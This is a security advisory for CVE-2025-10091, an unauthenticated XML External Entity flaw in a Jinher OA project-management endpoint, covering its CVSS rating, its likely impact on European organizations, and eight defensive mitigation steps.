CVE-2025-10091 is a security vulnerability identified in Jinher OA versions up to 1.2, specifically affecting an XML handler component located at /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx/?Type=add. The vulnerability is classified as an XML External Entity (XXE) reference issue. XXE vulnerabilities occur when an XML parser processes external entity references within XML input, allowing attackers to interfere with the processing of XML data. In this case, the manipulation of the XML input can lead to the inclusion and processing of external entities, which can be exploited remotely without any authentication or user interaction. The vulnerability has a CVSS 4.0 base score of 6.9, indicating a medium severity level. The vector metrics highlight that the attack can be performed remotely (AV:N), requires no privileges (PR:N), no user interaction (UI:N), and no scope change (S:N). The impact on confidentiality, integrity, and availability is limited but present (VC:L, VI:L, VA:L), meaning that some data disclosure, modification, or service disruption is possible but not extensive. The vulnerability is publicly disclosed, and although no known exploits in the wild have been reported yet, the availability of exploit information increases the risk of future exploitation. The lack of patch links suggests that a fix may not yet be available or publicly announced. The affected product, Jinher OA, is an office automation system used to manage organizational workflows and projects, making it a valuable target for attackers seeking to access internal business data or disrupt operations.

For European organizations using Jinher OA versions 1.0 through 1.2, this vulnerability poses a risk of unauthorized data access and potential disruption of internal project management workflows. Exploitation could allow attackers to read sensitive files on the server, perform server-side request forgery (SSRF), or cause denial of service conditions by manipulating XML processing. This could lead to leakage of confidential business information, intellectual property, or personal data protected under GDPR, resulting in regulatory penalties and reputational damage. The remote and unauthenticated nature of the vulnerability increases the attack surface, especially for organizations exposing the affected endpoint to the internet or accessible networks. Given that Jinher OA is used for office automation, the compromise of this system could also facilitate lateral movement within the corporate network, enabling further attacks on critical infrastructure or data stores. The medium severity rating reflects a moderate but tangible threat that should be addressed promptly to avoid escalation or chaining with other vulnerabilities.

1. Immediate mitigation should include restricting external access to the vulnerable XML handler endpoint (/c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx/?Type=add) through network segmentation, firewall rules, or VPN requirements to limit exposure. 2. Implement input validation and sanitization on XML inputs to disallow external entity declarations and references. 3. Disable XML external entity processing in the XML parser configuration used by Jinher OA, if configurable. 4. Monitor logs for unusual XML payloads or access patterns targeting the vulnerable endpoint to detect potential exploitation attempts. 5. Engage with the vendor or community to obtain patches or updates addressing this vulnerability as soon as they become available. 6. Conduct internal audits to identify all instances of Jinher OA deployments and verify their versions to prioritize remediation. 7. Educate system administrators and security teams about the risks of XXE and the importance of secure XML processing practices. 8. Consider deploying Web Application Firewalls (WAFs) with custom rules to detect and block XXE attack patterns targeting this endpoint.